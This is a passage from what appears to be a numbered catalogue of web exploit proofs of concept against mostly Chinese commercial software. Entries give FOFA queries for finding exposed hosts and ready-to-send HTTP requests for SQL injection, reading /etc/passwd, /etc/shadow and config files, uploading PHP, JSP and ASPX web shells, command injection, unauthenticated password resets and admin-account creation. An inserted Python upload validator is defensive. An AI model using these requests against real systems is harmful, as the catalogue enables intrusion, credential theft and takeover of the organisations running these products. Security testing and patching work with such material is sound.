User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信票务管理平台 SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6车载定位监控平台 SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. 电信网关配置管理系统 rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"

------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C校园网自助服务系统 flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文工程管理系统 arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创图书馆集群管理系统 updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼应用虚拟化系统 SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power plants.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. FuTong TianXia (富通天下) Foreign Trade ERP UploadEmailAttr arbitrary file upload
FOFA: title="用户登录_富通天下外贸ERP"
The name query parameter supplies the stored file's extension and the raw request body becomes the file content, so an ASP.NET .ashx handler can be uploaded. The handler below only writes "test" to the response. The original does not state where the file is stored or at which URL it is reached.
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<%@ WebHandler Language="C#" Class="AverageHandler" %>
using System;
using System.Web;

public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }

    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. Hillstone (山石网科) Yunjian (云鉴) Security Management System setSystemTimeAction command execution
FOFA: body="山石云鉴主机安全管理系统"
Three requests. The PHPSESSID value is arbitrary; it only has to be the same in steps 1 and 2.
1. Obtain a CSRF token:
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host: your-ip
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

2. Submit the token. The param value reaches a Python eval-style sink (the payload is a literal os.system() call), so a shell command runs. The PoC writes a marker file into a directory that is served as /master/img/. The published Content-Length did not match the body and is omitted here; send the correct length for the body you use.
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

3. Read the marker back:
GET /master/img/config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0

194. FE (飞企互联) Enterprise Operation Management Platform uploadAttachmentServlet arbitrary file upload
FOFA: app="FE-协作平台"
Per the original: if a request to /servlet/uploadAttachmentServlet gets a response, the host is affected. The filename field is used as-is, so the ../ sequence writes the JSP into the deployed fe.war under JBoss, where the container serves it.
POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

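The uploads in entries 192 and 194 (and the later ones in 199, 202 and 203) succeed because the server trusts the client-supplied filename or extension. The validator below is an added example, not code from any vendor on this page; the upload root, the extension lists and the RejectedUpload type are assumptions for illustration. It rejects traversal components, executable extensions (including a bare .ashx as in entry 192, which pathlib would treat as a dotfile with no suffix) and anything outside an allowlist, and it assigns a server-generated name so the client never chooses what is written to disk.

```python
"""Upload filename validation (added example; not any vendor's code).

Models the failure modes in entries 192 and 194 of this list: an executable
extension accepted because nothing validates it (or a query parameter such as
name=.ashx supplies it), and a path-traversal filename joined onto the upload
directory so the file lands inside a deployed web application. Upload root,
extension lists and the exception type are assumptions for illustration.
"""
from __future__ import annotations

import os
import posixpath
import re
import secrets

# Extensions an app container or web server would execute. Extend per stack.
EXECUTABLE_EXT = frozenset({
    ".php", ".phtml", ".php3", ".php5", ".phar",
    ".jsp", ".jspx", ".jspf", ".war",
    ".asp", ".aspx", ".ashx", ".asmx", ".asax", ".config",
    ".cgi", ".pl", ".sh",
})
# What this hypothetical application actually needs to accept.
ALLOWED_EXT = frozenset({".jpg", ".jpeg", ".png", ".gif", ".pdf", ".txt"})

_FILENAME_RE = re.compile(r'filename="([^"]*)"')


class RejectedUpload(ValueError):
    """Raised for any filename the server must not use."""


def filename_from_disposition(header: str) -> str:
    """Extract the raw filename from a multipart Content-Disposition value."""
    m = _FILENAME_RE.search(header)
    if not m:
        raise RejectedUpload("no filename in Content-Disposition")
    return m.group(1)


def extension_of(name: str) -> str:
    """Last extension of a bare filename, lower-cased.

    Done by hand rather than with pathlib: PurePosixPath(".ashx").suffix is ""
    because pathlib treats a leading-dot name as a dotfile, which would let the
    name=.ashx trick from entry 192 slip past an extension denylist.
    """
    name = name.rstrip(". ")          # Windows drops trailing dots and spaces
    i = name.rfind(".")
    return name[i:].lower() if i != -1 else ""


def safe_upload_path(upload_root: str, client_filename: str,
                     stem: str | None = None) -> str:
    """Validate client_filename and return the absolute path to write to.

    Rejects empty or NUL-containing names, any path component, executable
    extensions and extensions outside ALLOWED_EXT, then re-checks that the
    final path still lies under upload_root. The on-disk stem is random
    unless the caller supplies one, so the client never chooses the name.
    """
    if not client_filename or "\x00" in client_filename:
        raise RejectedUpload("empty or NUL-containing filename")
    # Entry 194 uses "/", but a Windows host would also honour "\".
    normalized = client_filename.replace("\\", "/")
    if normalized != posixpath.basename(normalized) or normalized in (".", ".."):
        raise RejectedUpload("path components are not allowed")
    ext = extension_of(normalized)
    if ext in EXECUTABLE_EXT:
        raise RejectedUpload(f"executable extension {ext!r}")
    if ext not in ALLOWED_EXT:
        raise RejectedUpload(f"extension {ext!r} not allowed")
    root = os.path.realpath(upload_root)
    final = os.path.realpath(os.path.join(root, (stem or secrets.token_hex(16)) + ext))
    if os.path.commonpath([root, final]) != root:   # belt and braces
        raise RejectedUpload("resolved path escapes upload root")
    return final


def classify(upload_root: str, disposition: str) -> str:
    """Return "accepted" or "rejected: <reason>" for one multipart part."""
    try:
        safe_upload_path(upload_root, filename_from_disposition(disposition))
        return "accepted"
    except RejectedUpload as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    # Constructed inputs: the filenames the PoCs on this page send.
    parts = [
        'form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"',
        'form-data; name="fj_file"; filename="11.jsp"',
        'form-data; name="files[]"; filename="tttt.php"',
        'form-data; name="attr"; filename=".ashx"',
        'form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"',
    ]
    for p in parts:
        print(f"{filename_from_disposition(p)!r:50} -> {classify('/var/app/uploads', p)}")
```

The executable denylist is checked before the allowlist on purpose: if an operator later widens ALLOWED_EXT by mistake, a server-side executable extension still cannot get through. The declared Content-Type of the part is deliberately ignored; entry 203 shows why (a JSP sent as image/jpeg).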
195. Feiyuxing (飞鱼星) Internet Behaviour Management System send_order.cgi command execution
FOFA: title=="飞鱼星企业级智能上网行为管理系统"
The name field of the JSON body is interpolated into a shell command; ";uname -a;echo " ends the intended command and runs uname. Content-Length must match the body (68 bytes for the body shown).
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: your-ip
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. Henan Fengsu Technology (河南省风速科技) Unified Authentication Platform password reset
FOFA: body="/cas/themes/zbvc/js/jquery.min.js"
resetPasswordBySuper is reached with no session cookie or token; xgh identifies the account and newPass becomes its new password. Content-Length 45 matches the body shown.
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. Zhejiang University Entsoft (浙大恩特) Customer Resource Management System Quotegask_editAction SQL injection
FOFA: app="浙大恩特客户资源管理系统"
Union-based injection through goonumStr. The ;.js appended to the path is a servlet path parameter: the container drops it when routing, so the request still reaches Quotegask_editAction.entweb even though the URL ends in .js. Log matching must therefore strip ;-parameters before comparing paths.
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. Aliyun Drive WebDAV (aliyundrive-webdav LuCI app) command injection
CVE-2024-29640
The sid parameter is the URL-encoded form of `ls />/www/aaa.txt` (backticks included): the value is substituted into a shell command, and the directory listing is written to /www/aaa.txt, which uhttpd serves from the router's document root. The request carries a sysauth cookie, i.e. an authenticated LuCI session is required; the cookie value below is the write-up's own.
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Host: your-ip
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit CMS assetsmanager/upload file upload
FOFA: title="Authenticate Please!"
Three steps: fetch the login page for its CSRF token (the field is spelled csfr in the product), log in to obtain a session cookie, then upload through the asset manager. The token and cookie values below are the ones from the original write-up; use the values your target returns.
1. Fetch the CSRF token from the login page:
GET /auth/login?to=/ HTTP/1.1
Host: your-ip

Response: 200; the page contains csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
2. Log in with that token (the write-up uses admin/admin) to obtain a session cookie:
POST /auth/check HTTP/1.1
Host: your-ip
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200 with
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/
3. Upload a PHP file with that session cookie. The asset manager keeps the client's filename and extension, and the file is then reachable at /storage/uploads/tttt.php (the PoC deletes itself on first execution):
POST /assetsmanager/upload HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋CMS) dmku SQL injection
FOFA: app="海洋CMS"
Time-based blind injection through the id parameter (MySQL sleep(5)). The PHPSESSID value is arbitrary.
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Host: your-ip
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. Founder (方正) All-Media News Editing System binary SQL injection
FOFA: body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
The TableName parameter is concatenated into a query. URL-decoded, the value is
DOM_IMAGE where REFID=-1 union select '1'; WAITFOR DELAY '0:0:5';select DOM_IMAGE from IMG_LARGE_PATH
i.e. a stacked T-SQL time-based payload; a vulnerable host answers about 5 seconds late.
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

